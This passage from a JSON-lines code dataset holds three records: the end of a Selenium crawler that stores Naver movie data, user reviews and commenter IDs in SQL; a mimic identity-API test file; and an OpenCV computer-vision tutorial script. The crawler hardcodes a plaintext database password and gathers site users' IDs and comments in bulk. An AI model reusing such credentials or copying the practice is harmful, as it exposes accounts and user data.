\"리뷰 코드\")\n review_one.append(r_code)\n movie_review_one.append(r_code)\n \n #title\n try:\n review_one.append(self.find_element_by_css_selector(\"#content > div.article > div.obj_section.noline.center_obj > div.review > div.top_behavior > strong\").text)\n except:\n review_one.append(None)\n # print(\"--title\")\n #content\n len_content = len(self.find_element_by_class_name(\"user_tx_area\").find_elements_by_tag_name(\"p\"))\n content = \"\"\n for i in range(len_content):\n try:\n content = content + \" \" + self.find_element_by_css_selector(\"#content > div.article > div.obj_section.noline.center_obj > div.review > div.user_tx_area > p:nth-child(\"+str(i+1)+\")\").text\n except:\n pass\n #content > div.article > div.obj_section.noline.center_obj > div.review > div.user_tx_area > p:nth-child(11)\n if content==\"\":\n review_one.append(None)\n else:\n review_one.append(content)\n # print(\"--content\")\n #lookup\n try:\n review_one.append(int(self.find_element_by_css_selector(\"#content > div.article > div.obj_section.noline.center_obj > div.review > div.board_title > div > span:nth-child(1) > em\").text))\n except:\n review_one.append(None)\n # print(\"--lookup\")\n #recommend\n try:\n review_one.append(int(self.find_element_by_css_selector(\"#goodReviewCount\").text))\n except:\n review_one.append(None)\n # print(\"--recommend\")\n \n review2.extend(self.get_review2_table_info(r_code))\n review.append(review_one)\n movie_review.append(movie_review_one)\n self.back()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n except:\n break\n\n return review, movie_review, review2\n except:\n return None, None, None\n #리뷰2(리뷰의 리뷰) 테이블 정보 수집\n def get_review2_table_info(self, r_code):\n review2 = []\n num_review2 = int(self.find_element_by_css_selector(\"#cbox_module > div > div.u_cbox_head > span\").text)\n if num_review2==0:\n pass\n else:\n num_page2 = int(np.ceil(num_review2/20))\n for page2 in range(num_page2):\n if page2 == 5:\n break\n elif page2 == 0:\n pass\n else:\n try:\n self.find_element_by_xpath('//*[@id=\"cbox_module\"]/div/div[5]/div/a['+str(page2)+']/span').click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n except:\n break\n for i in range(20):\n try:\n review2_one = [r_code]\n #id\n review2_one.append(self.find_element_by_xpath('//*[@id=\"cbox_module_wai_u_cbox_content_wrap_tabpanel\"]/ul/li['+str(i+1)+']/div[1]/div/div[1]/span[1]/span/span/span/span').text)\n #content\n try:\n review2_one.append(self.find_element_by_xpath('//*[@id=\"cbox_module_wai_u_cbox_content_wrap_tabpanel\"]/ul/li['+str(i+1)+']/div[1]/div/div[2]').text)\n except:\n review2_one.append(None)\n #date\n try:\n review2_one.append(self.find_element_by_xpath('//*[@id=\"cbox_module_wai_u_cbox_content_wrap_tabpanel\"]/ul/li['+str(i+1)+']/div[1]/div/div[3]/span[1]').text)\n except:\n review2_one.append(None)\n #good\n try:\n review2_one.append(int(self.find_element_by_xpath('//*[@id=\"cbox_module_wai_u_cbox_content_wrap_tabpanel\"]/ul/li['+str(i+1)+']/div[1]/div/div[4]/div/a[1]/em').text))\n except:\n review2_one.append(None)\n #bad\n try:\n review2_one.append(int(self.find_element_by_xpath('//*[@id=\"cbox_module_wai_u_cbox_content_wrap_tabpanel\"]/ul/li['+str(i+1)+']/div[1]/div/div[4]/div/a[2]/em').text))\n except:\n review2_one.append(None)\n\n review2.append(review2_one)\n except:\n break\n\n return review2\n #이미지 테이블 정보 수집\n def get_image_table_info(self, movie_code, url):\n #[movie_code, image_url]\n self.get(self.current_url.replace(\"detail\", \"basic\"))\n try:\n self.get(url)\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n image = []\n for i in range(int(self.find_element_by_css_selector(\"#_MainPhotoArea > div.title_area > span > em\").text)):\n image_one = [movie_code]\n image_one.append(self.find_element_by_css_selector(\"#_MainPhotoArea > div.viewer > div > img\").get_attribute(\"src\"))\n image.append(image_one)\n self.find_element_by_css_selector(\"#_MainPhotoArea > div.viewer > a._NextBtn._NoOutline.pic_next\").click()\n if image==[]:\n return None\n else:\n return image\n except:\n return None\n #비디오 테이블 정보 수집\n def get_video_table_info(self, movie_code):\n #[movie_index, video_name, video_url]\n try:\n self.get(self.current_url.replace(\"basic\", \"media\"))\n video = []\n num_v = len(self.find_elements_by_css_selector(\"#content > div.article > div.obj_section2.noline > div > div.ifr_module > div > div > ul > li > p.tx_video.ico > a\"))\n for index in range(num_v):\n vd = self.find_elements_by_css_selector(\"#content > div.article > div.obj_section2.noline > div > div.ifr_module > div > div > ul > li > p.tx_video.ico > a\")[index]\n video_one = [movie_code]\n video_one.append(vd.text)\n vd.click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n video_one.append(self.current_url)\n self.back()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n if video_one==[movie_code]:\n pass\n else:\n video.append(video_one)\n self.back()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n if video==[]:\n return None\n else:\n return video\n except:\n return None\n #장르 테이블 정보 수집\n def get_jenre_table_info(self, movie_code):\n #[movie_index, jenre_type]\n try:\n jenre = []\n for jnr in self.find_elements_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/div[1]/dl/dd[1]/p/span[1]/a'):\n jenre_one = [movie_code]\n jenre_one.append(jnr.text)\n jenre.append(jenre_one)\n return jenre\n except:\n return None\n #국가 테이블 정보 수집\n def get_nation_table_info(self, movie_code):\n # [movie_code, country_name]\n try:\n nation = []\n for ctr in self.find_elements_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/div[1]/dl/dd[1]/p/span[2]/a'):\n nation_one = [movie_code]\n nation_one.append(ctr.text)\n nation.append(nation_one)\n return nation\n except:\n return None\n #평점 테이블 정보 수집\n def get_point_table_info(self, movie_code):\n #[movie_code, point_content, point_id, point_date, point_good, point_bad, point_star]\n try:\n point = []\n self.get(self.current_url.replace(\"basic\", \"point\"))\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n self.switch_to.frame('pointAfterListIframe')\n num_point = int(self.find_element_by_css_selector(\"body > div > div > div.score_total > strong > em\").text.replace(\",\",\"\"))\n if num_point%10==0:\n num_page = int(num_point/10)\n else:\n num_page = int(num_point/10) + 1\n for page in range(1, num_page+1):\n if page==11:\n break\n elif page==1:\n pass\n else:\n self.find_element_by_css_selector(\"#pagerTagAnchor\"+str(page)+\" > em\").click()\n\n for i in range(10):\n try:\n point_one = [movie_code]\n #content\n content = self.find_element_by_css_selector(\"#_filtered_ment_\"+str(i)).text\n if content=='':\n point_one.append(None)\n else:\n point_one.append(content)\n #id\n point_one.append(self.find_element_by_css_selector(\"body > div > div > div.score_result > ul > li:nth-child(\"+str(i+1)+\") > div.score_reple > dl > dt > em:nth-child(1) > a > span\").text)\n #date\n point_one.append(self.find_element_by_css_selector(\"body > div > div > div.score_result > ul > li:nth-child(\"+str(i+1)+\") > div.score_reple > dl > dt > em:nth-child(2)\").text)\n #good\n point_one.append(int(self.find_element_by_css_selector(\"body > div > div > div.score_result > ul > li:nth-child(\"+str(i+1)+\") > div.btn_area > a._sympathyButton > strong\").text))\n #bad\n point_one.append(int(self.find_element_by_css_selector(\"body > div > div > div.score_result > ul > li:nth-child(\"+str(i+1)+\") > div.btn_area > a._notSympathyButton > strong\").text))\n #star\n point_one.append(int(self.find_element_by_css_selector(\"body > div > div > div.score_result > ul > li:nth-child(\"+str(i+1)+\") > div.star_score > em\").text))\n \n point.append(point_one)\n except:\n break\n self.get(self.current_url.replace(\"point\", \"basic\"))\n return point\n except:\n return None\n\nif __name__ == '__main__':\n #해당 연도 데이터 크롤링\n def get_all_of_year_main(year, user, start):\n crawler = Naver_scrapping()\n crawler.land_page()\n\n crawler.land_directory_of_year(year)\n movie_urls_of_year = crawler.get_movies_in_the_page()\n crawler.quit()\n #578\n for url in movie_urls_of_year[start:]:\n \n print(url)\n movie_table = []\n\n crawler = Naver_scrapping()\n\n\n crawler.get(url)\n crawler.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n\n\n print(\">>land page success\")\n\n movie_code = crawler.get_movie_code(url)\n\n print(\">>movie code complete\")\n\n try:\n movie_table.append(crawler.get_movie_table_info(movie_code, year))\n user.input_data(table = \"movie\",\n columns=\"movie_code, title, original_title, opening_date, \\\n playing_time, domestic_rate, foreign_rate, cumulative_audience, \\\n subtitle, content, poster_url, audience_rate, journalist_rate, \\\n netizen_rate, audience_count, journalist_count, netizen_count\", \n data=movie_table)\n print(\">>movie complete\")\n except:\n print(\">>movie failed ---\")\n # #actor & movie_actor\n try:\n actor, movie_actor = crawler.get_actor_table_info(movie_code)\n user.input_data(table = \"actor\",\n columns=\"actor_name, original_actor_name, actor_code\", \n data=actor)\n print(\">>actor complete\")\n except:\n print(\">>actor failed ---\")\n try:\n user.input_data(table = \"movie_actor\",\n columns=\"movie_code, cast, role, actor_code\", \n data=movie_actor)\n print(\">>movie actor complete\")\n except:\n print(\">>movie actor failed ---\")\n try:\n director, movie_director = crawler.get_director_table_info(movie_code)\n user.input_data(table = \"director\",\n columns=\"director_name, original_director_name, director_code\", \n data=director)\n print(\">>director complete\")\n except:\n print(\">>director failed ---\")\n try:\n user.input_data(table = \"movie_director\",\n columns=\"movie_code, director_code\", \n data=movie_director)\n print(\">>movie director complete\")\n except:\n print(\">>movie director failed ---\")\n \n try:\n user.input_data(table = \"image\",\n columns=\"movie_code, image_url\", \n data=crawler.get_image_table_info(movie_code, url))\n print(\">>image complete\")\n except:\n print(\">>image failed ---\")\n try:\n user.input_data(table = \"video\",\n columns=\"movie_code, video_title, video_url\", \n data=crawler.get_video_table_info(movie_code))\n print(\">>video complete\")\n except:\n print(\">>video failed ---\")\n try:\n user.input_data(table = \"jenre\",\n columns=\"movie_code, jenre_name\", \n data=crawler.get_jenre_table_info(movie_code))\n print(\">>jenre complete\")\n except:\n print(\">>jenre failed ---\")\n try:\n user.input_data(table = \"nation\",\n columns=\"movie_code, country\", \n data=crawler.get_nation_table_info(movie_code))\n print(\">>nation complete\")\n except:\n print(\">>nation failed ---\")\n try:\n user.input_data(table = \"point\",\n columns=\"movie_code, point_content, point_id, \\\n point_date, point_good, point_bad, point_star\", \n data=crawler.get_point_table_info(movie_code))\n print(\">>point complete\")\n except:\n print(\">>point failed ---\")\n\n review, movie_review, review2 = crawler.get_review_table_info(movie_code)\n print(\">>review function complete\")\n try:\n user.input_data(table = \"review\",\n columns=\"review_id, review_date, review_code, review_title, review_content, review_lookup, review_recommend\", \n data=review)\n print(\">>review complete\")\n except:\n print(\">>review failed ---\")\n try:\n user.input_data(table = \"movie_review\",\n columns=\"movie_code, review_code\", \n data=movie_review)\n print(\">>movie review complete\")\n except:\n print(\">>movie review failed ---\")\n try:\n user.input_data(table = \"review2\",\n columns=\"review_code, review2_id, review2_content, review2_date, review2_good, review2_bad\", \n data=review2)\n print(\">>review2 complete\")\n except:\n print(\">>review2 failed ---\")\n crawler.quit()\n \n hyojin = SQL(db=\"naver\", user=\"hyojin\", password=\"gywls\")\n get_all_of_year_main(2019, hyojin, 0)\n get_all_of_year_main(2018, hyojin, 0)\n get_all_of_year_main(2017, hyojin, 0)\n get_all_of_year_main(2016, hyojin, 0)\n get_all_of_year_main(2015, hyojin, 0)\n get_all_of_year_main(2014, hyojin, 0)\n get_all_of_year_main(2013, hyojin, 0)\n get_all_of_year_main(2012, hyojin, 0)","repo_name":"JONHYOJIN/DataBase","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":35496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39255762777","text":"\"\"\"\nTests for mimic identity :mod:`mimic.rest.identity_api`\n\"\"\"\n\nfrom __future__ import absolute_import, division, unicode_literals\n\nimport json\nimport uuid\n\nfrom six import text_type\n\nfrom twisted.trial.unittest import SynchronousTestCase\nfrom twisted.internet.task import Clock\n\nfrom mimic.core import MimicCore\nfrom mimic.resource import MimicRoot\nfrom mimic.test.dummy import (\n make_example_internal_api,\n make_example_external_api\n)\nfrom mimic.test.helpers import json_request, request, get_template_id\nfrom mimic.test.mixins import IdentityAuthMixin, InvalidJsonMixin, ServiceIdHeaderMixin\n\n\nclass TestIdentityOSKSCatalogTenantAdminEndpointTemplatesList(\n SynchronousTestCase, IdentityAuthMixin, ServiceIdHeaderMixin):\n \"\"\"\n Tests for ``/identity/v2.0//OS-KSCATALOG/endpointTemplates``,\n provided by :obj:`mimic.rest.idenity_api.IdentityApi`\n \"\"\"\n def setUp(self):\n self.tenant_id = 'some_tenant'\n self.core = MimicCore(Clock(), [])\n self.root = MimicRoot(self.core).app.resource()\n self.uri = (\n \"/identity/v2.0/tenants/\" + self.tenant_id +\n \"/OS-KSCATALOG/endpoints\"\n )\n self.eeapi_name = u\"externalServiceName\"\n self.eeapi = make_example_external_api(\n self,\n name=self.eeapi_name,\n set_enabled=True\n )\n self.headers = {\n b'X-Auth-Token': [b'ABCDEF987654321']\n }\n self.verb = b\"GET\"\n\n def test_list_only_internal_apis_available(self):\n \"\"\"\n GET will not list Internal APIs.\n \"\"\"\n self.core.add_api(make_example_internal_api(self))\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n self.assertEqual(response.code, 200)\n self.assertEqual(len(json_body['endpoints']), 0)\n self.assertEqual(len(json_body['endpoints_links']), 0)\n\n def test_list_single_template(self):\n \"\"\"\n GET will list an external API if it has a endpoint template.\n \"\"\"\n self.core.add_api(self.eeapi)\n\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n self.assertEqual(response.code, 200)\n self.assertEqual(len(json_body['endpoints']), 1)\n self.assertEqual(len(json_body['endpoints_links']), 0)\n\n def test_list_template_all_disabled(self):\n \"\"\"\n GET will not list endpoint templates that are disabled.\n \"\"\"\n self.core.add_api(self.eeapi)\n id_key = get_template_id(self, self.eeapi)\n self.eeapi.endpoint_templates[id_key].enabled_key = False\n\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n self.assertEqual(response.code, 200)\n self.assertEqual(len(json_body['endpoints']), 0)\n self.assertEqual(len(json_body['endpoints_links']), 0)\n\n def test_list_single_template_external_and_internal_apis(self):\n \"\"\"\n GET will only list external API endpoint templates.\n \"\"\"\n self.core.add_api(self.eeapi)\n self.core.add_api(make_example_internal_api(self))\n\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n self.assertEqual(response.code, 200)\n self.assertEqual(len(json_body['endpoints']), 1)\n self.assertEqual(len(json_body['endpoints_links']), 0)\n\n def test_multiple_external_apis(self):\n \"\"\"\n GET will list multiple external APIs.\n \"\"\"\n api_list = [\n make_example_external_api(\n self,\n name=self.eeapi_name + text_type(uuid.uuid4()),\n service_type='service-' + text_type(uuid.uuid4()),\n set_enabled=True\n )\n for ignored in range(10)\n ]\n # eeapi should be the first entry in the list\n api_list.insert(0, self.eeapi)\n\n for api in api_list:\n self.core.add_api(api)\n\n self.assertEqual(len(self.core._uuid_to_api_external),\n len(api_list))\n\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n def get_header(header_name):\n return response.headers.getRawHeaders(header_name)[0].decode(\"utf-8\")\n\n self.assertEqual(response.code, 200)\n\n self.assertEqual(len(json_body['endpoints']),\n len(api_list))\n self.assertEqual(len(json_body['endpoints_links']), 0)\n\n\nclass TestIdentityOSKSCatalogTenantAdminEndpointTemplatesCreate(\n SynchronousTestCase, IdentityAuthMixin, InvalidJsonMixin):\n \"\"\"\n Tests for ``/identity/v2.0//OS-KSCATALOG/endpointTemplates``,\n provided by :obj:`mimic.rest.idenity_api.IdentityApi`\n \"\"\"\n def setUp(self):\n self.tenant_id = 'some_tenant'\n self.core = MimicCore(Clock(), [])\n self.root = MimicRoot(self.core).app.resource()\n self.uri = (\n \"/identity/v2.0/tenants/\" + self.tenant_id +\n \"/OS-KSCATALOG/endpoints\"\n )\n self.eeapi_name = u\"externalServiceName\"\n self.eeapi = make_example_external_api(\n self,\n name=self.eeapi_name,\n set_enabled=False\n )\n self.headers = {\n b'X-Auth-Token': [b'ABCDEF987654321']\n }\n self.verb = b\"POST\"\n\n def test_json_body_missing_required_field_oskscatalog(self):\n \"\"\"\n POST with the OS-KSCATALOG:endointTemplate body entirely missing\n results in 400.\n \"\"\"\n data = {\n 'id': text_type(uuid.uuid4()),\n }\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n body=data,\n headers=self.headers))\n\n self.assertEqual(response.code, 400)\n self.assertEqual(json_body['badRequest']['code'], 400)\n self.assertTrue(\n json_body['badRequest']['message'].startswith(\n \"Invalid Content. OS-KSCATALOG:endpointTemplate:id is \"\n \"required.\"\n )\n )\n\n def test_json_body_missing_required_field_template_id(self):\n \"\"\"\n POST with the OS-KSCATALOG:endointTemplate body missing it's content\n results in 400.\n \"\"\"\n data = {\n \"OS-KSCATALOG:endpointTemplate\": {\n }\n }\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n body=data,\n headers=self.headers))\n\n self.assertEqual(response.code, 400)\n self.assertEqual(json_body['badRequest']['code'], 400)\n self.assertTrue(\n json_body['badRequest']['message'].startswith(\n \"Invalid Content. OS-KSCATALOG:endpointTemplate:id is \"\n \"required.\"\n )\n )\n\n def test_invalid_template_id(self):\n \"\"\"\n POST with invalid endpointTemplate ID results in 404.\n \"\"\"\n self.core.add_api(self.eeapi)\n data = {\n \"OS-KSCATALOG:endpointTemplate\": {\n \"id\": \"some-id\"\n }\n }\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n body=data,\n headers=self.headers))\n\n self.assertEqual(response.code, 404)\n self.assertEqual(json_body['itemNotFound']['code'], 404)\n self.assertTrue(\n json_body['itemNotFound']['message'].startswith(\n \"Unable to locate an External API with the given Template ID.\"\n )\n )\n\n def test_enable_template(self):\n \"\"\"\n POST can update an existing endpoint template resulting in a 201.\n \"\"\"\n self.core.add_api(self.eeapi)\n id_key = get_template_id(self, self.eeapi)\n data = {\n \"OS-KSCATALOG:endpointTemplate\": {\n \"id\": id_key\n }\n }\n\n req = request(self, self.root, self.verb,\n self.uri,\n body=json.dumps(data).encode(\"utf-8\"),\n headers=self.headers)\n\n response = self.successResultOf(req)\n self.assertEqual(response.code, 201)\n\n\nclass TestIdentityOSKSCatalogTenantAdminEndpointTemplatesDelete(SynchronousTestCase, IdentityAuthMixin):\n \"\"\"\n Tests for ``/identity/v2.0//OS-KSCATALOG/endpointTemplates``,\n provided by :obj:`mimic.rest.idenity_api.IdentityApi`\n \"\"\"\n def setUp(self):\n self.tenant_id = 'some_tenant'\n self.core = MimicCore(Clock(), [])\n self.root = MimicRoot(self.core).app.resource()\n self.eeapi_name = u\"externalServiceName\"\n self.eeapi = make_example_external_api(\n self,\n name=self.eeapi_name\n )\n self.template_id = get_template_id(self, self.eeapi)\n self.assertIsNotNone(self.template_id)\n self.uri = (\n \"/identity/v2.0/tenants/\" + self.tenant_id +\n \"/OS-KSCATALOG/endpoints/\" + self.template_id\n )\n self.headers = {\n b'X-Auth-Token': [b'ABCDEF987654321']\n }\n self.verb = b\"DELETE\"\n\n def test_invalid_template_id(self):\n \"\"\"\n DELETE with an invalid endpoint template id results in 404.\n \"\"\"\n self.eeapi.remove_template(self.template_id)\n self.core.add_api(self.eeapi)\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n self.assertEqual(response.code, 404)\n self.assertEqual(json_body['itemNotFound']['code'], 404)\n self.assertTrue(\n json_body['itemNotFound']['message'].startswith(\n \"Unable to locate an External API with the given Template ID.\"\n )\n )\n\n def test_template_id_not_enabled_for_tenant(self):\n \"\"\"\n DELETE for endpoint template not enabled for a tenant or globally\n results in 404.\n \"\"\"\n self.core.add_api(self.eeapi)\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n self.assertEqual(response.code, 404)\n self.assertEqual(json_body['itemNotFound']['code'], 404)\n self.assertEqual(\n json_body['itemNotFound']['message'],\n \"Template not enabled for tenant\"\n )\n\n def test_disable_template(self):\n \"\"\"\n DELETE for endpoint template enabled for tenant results in 204.\n \"\"\"\n self.core.add_api(self.eeapi)\n self.eeapi.enable_endpoint_for_tenant(\n self.tenant_id,\n self.template_id\n )\n eeapi2 = make_example_external_api(\n self,\n name=\"alternate \" + self.eeapi_name\n )\n ept_id2 = get_template_id(self, eeapi2)\n eeapi2.remove_template(ept_id2)\n self.core.add_api(eeapi2)\n req = request(self, self.root, self.verb,\n self.uri,\n headers=self.headers)\n\n response = self.successResultOf(req)\n self.assertEqual(response.code, 204)\n","repo_name":"rackerlabs/mimic","sub_path":"mimic/test/test_identity_oskscatalog_per_tenant.py","file_name":"test_identity_oskscatalog_per_tenant.py","file_ext":"py","file_size_in_byte":11971,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"37"} +{"seq_id":"30939778420","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 9 15:45:29 2023\r\n\r\n@author: hasan\r\n\"\"\"\r\n#%% Edge Detection\r\n\r\nimport cv2 \r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimg = cv2.imread(\"london.jpg\", 0)\r\nplt.figure(), plt.imshow(img, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#Without doing anything\r\nedges = cv2.Canny(image = img, threshold1 = 0, threshold2 = 255)\r\nplt.figure(), plt.imshow(edges, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#With thresholds\r\nmedImg = np.median(img)\r\nprint(medImg)\r\n\r\nlow = int(max(0, (1 - 0.33) * medImg))\r\nhigh = int(min(255, (1 + 0.33) * medImg))\r\n\r\nprint(low, high)\r\n\r\nedges = cv2.Canny(image = img, threshold1 = low, threshold2 = high)\r\nplt.figure(), plt.imshow(edges, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#With blurring + thresolds\r\n\r\nblurredImg = cv2.blur(img, ksize= (5,5))\r\nplt.figure(), plt.imshow(blurredImg, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\nmedBlurredImg = np.median(blurredImg)\r\n\r\nlow = int(max(0, (1 - 0.33) * medBlurredImg))\r\nhigh = int(min(255, (1 + 0.33) * medBlurredImg))\r\n\r\nedges2 = cv2.Canny(image = blurredImg, threshold1 = low, threshold2 = high)\r\nplt.figure(), plt.imshow(edges2, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#%% Corner Detection\r\n\r\nimport cv2 \r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimg = cv2.imread(\"sudoku.jpg\", 0)\r\nimg = np.float32(img)\r\nprint(img.shape)\r\n\r\nplt.figure(), plt.imshow(img, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n# harris corner detection\r\ndst = cv2.cornerHarris(img, blockSize = 2, ksize = 3, k = 0.04)\r\ndst = cv2.dilate(dst,None)\r\nimg[dst > 0.2 * dst.max()] = 255\r\nplt.figure(), plt.imshow(img, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#shi tomasi detection\r\n\r\nimg = cv2.imread(\"sudoku.jpg\", 0)\r\nimg = np.float32(img)\r\n\r\ncorners = cv2.goodFeaturesToTrack(img, 120, 0.01,10)\r\ncorners = np.int64(corners)\r\n\r\nfor i in corners:\r\n x,y = i.ravel()\r\n cv2.circle(img, (x,y), 3, (125,125,125), cv2.FILLED)\r\n\r\nplt.imshow(img), plt.axis(\"off\")\r\n\r\n#%% contour detection\r\n\r\nimg = cv2.imread(\"contour.jpg\", 0)\r\nplt.figure(), plt.imshow(img, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\ncontours, hierarch = cv2.findContours(img, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\r\nexternal_contour = np.zeros(img.shape)\r\ninternal_contour = np.zeros(img.shape)\r\n\r\nfor i in range(len(contours)):\r\n \r\n #external \r\n if hierarch[0][i][3] == -1:\r\n cv2.drawContours(external_contour, contours, i, 255, -1)\r\n else:\r\n cv2.drawContours(internal_contour, contours, i, 255, -1)\r\n\r\n\r\nplt.figure(), plt.imshow(external_contour, cmap=\"gray\"), plt.axis(\"off\")\r\nplt.figure(), plt.imshow(internal_contour, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n\r\n#Object detection with color\r\n\r\nimport cv2 \r\nimport numpy as np\r\nfrom collections import deque\r\n\r\nbuffer_size = 16\r\npts = deque(maxlen = buffer_size)\r\n\r\n#HSV blue\r\n\r\nblueLower = (84,98,0)\r\nblueUpper = (179,255,255)\r\n\r\n#capture\r\n\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3,960)\r\ncap.set(4,480)\r\n\r\nwhile True:\r\n \r\n success, imgOriginal = cap.read()\r\n \r\n if success:\r\n \r\n #blur\r\n blurred = cv2.GaussianBlur(imgOriginal, (11,11), 0)\r\n \r\n # hsv\r\n hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)\r\n cv2.imshow(\"HSV Image\", hsv)\r\n \r\n #mask for blue\r\n mask = cv2.inRange(hsv,blueLower,blueUpper)\r\n mask = cv2.erode(mask,None, iterations = 2)\r\n mask = cv2.dilate(mask,None, iterations = 2)\r\n cv2.imshow(\"Mask + erosion and dilate\", mask)\r\n \r\n #contours\r\n contours,_ = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n center = None\r\n \r\n if len(contours) > 0:\r\n \r\n #get the max contour\r\n c = max(contours, key = cv2.contourArea)\r\n #rectangle\r\n rect = cv2.minAreaRect(c)\r\n ((x,y), (width,height), rotation) = rect \r\n \r\n #box\r\n box = cv2.boxPoints(rect)\r\n box = np.int64(box)\r\n \r\n #moment\r\n M = cv2.moments(c)\r\n center = (int(M[\"m10\"] / M[\"m00\"]),int(M[\"m01\"] / M[\"m00\"]))\r\n \r\n #draw \r\n cv2.drawContours(imgOriginal, [box], 0, (0,255,255), 2)\r\n cv2.circle(imgOriginal, center, 5, (255,0,255), -1)\r\n \r\n pts.appendleft(center)\r\n \r\n for i in range(1, len(pts)):\r\n \r\n if pts[i - 1] is None or pts[i] is None: continue\r\n cv2.line(imgOriginal, pts[i-1], pts[i], (0,255,0), 3)\r\n \r\n \r\n cv2.imshow(\"Original\", imgOriginal)\r\n if cv2.waitkey(1) & 0XFF == ord(\"q\") : break\r\n \r\ncap.release()\r\ncv2.detroyAllWindows()\r\n \r\n#%% Template Matching\r\n\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nimg = cv2.imread(\"cat.jpg\",0)\r\nprint(img.shape)\r\n\r\ntemplate = cv2.imread(\"cat_face.jpg\", 0)\r\nprint(template.shape)\r\nh,w = template.shape\r\n\r\nmethods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',\r\n 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']\r\n\r\nfor met in methods:\r\n \r\n method = eval(met)\r\n res = cv2.matchTemplate(img,template,method)\r\n print(res.shape)\r\n \r\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\r\n \r\n if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\r\n top_left = min_loc\r\n else:\r\n top_left = max_loc\r\n \r\n bottom_right = (top_left[0] + w, top_left[1] + h)\r\n cv2.rectangle(img, top_left, bottom_right, 255, 2)\r\n \r\n plt.figure()\r\n plt.subplot(121), plt.imshow(res,cmap=\"gray\")\r\n plt.title(\"Matched Image\"), plt.axis(\"off\")\r\n plt.subplot(122), plt.imshow(img,cmap=\"gray\")\r\n plt.title(\"Detected Result\"), plt.axis(\"off\")\r\n plt.suptitle(met)\r\n plt.show()\r\n\r\n#%% Feature Matching\r\n\r\nchocos = cv2.imread(\"chocolates.jpg\",0)\r\nplt.figure(), plt.imshow(chocos, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\nwhiteChoco = cv2.imread(\"nestle.jpg\", 0)\r\nplt.figure(), plt.imshow(whiteChoco, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#Brute Force (doesn't work well and its slow)\r\norb = cv2.ORB_create()\r\n\r\nkp1, des1 = orb.detectAndCompute(whiteChoco, None)\r\nkp2, des2 = orb.detectAndCompute(chocos, None)\r\n\r\nbf = cv2.BFMatcher(cv2.NORM_HAMMING)\r\n\r\nmatches = bf.match(des1,des2)\r\n\r\nmatches = sorted(matches, key = lambda x: x.distance)\r\n\r\nplt.figure()\r\nimg_match = cv2.drawMatches(whiteChoco, kp1, chocos, kp2, matches[:20], None, flags = 2)\r\nplt.imshow(img_match), plt.axis(\"off\")\r\n\r\n\r\n#sift\r\n\r\nsift = cv2.SIFT_create()\r\n\r\n#bf \r\n\r\nbf = cv2.BFMatcher()\r\n\r\n# key point detector with sift\r\n\r\nkp1, des1 = sift.detectAndCompute(whiteChoco, None)\r\nkp2, des2 = sift.detectAndCompute(chocos, None)\r\n\r\nmatches = bf.knnMatch(des1,des2, k = 2)\r\n\r\nbetterMatches = []\r\n\r\nfor match1, match2 in matches:\r\n \r\n if match1.distance < 0.75*match2.distance:\r\n betterMatches.append([match1])\r\n\r\nplt.figure()\r\nsift_matches = cv2.drawMatchesKnn(whiteChoco, kp1, chocos, kp2, betterMatches, None, flags = 2)\r\nplt.imshow(sift_matches), plt.axis(\"off\")\r\n\r\n#%% Watershed algorithm\r\n\r\nimport cv2 \r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\ncoins = cv2.imread(\"coins.jpg\")\r\nplt.figure(), 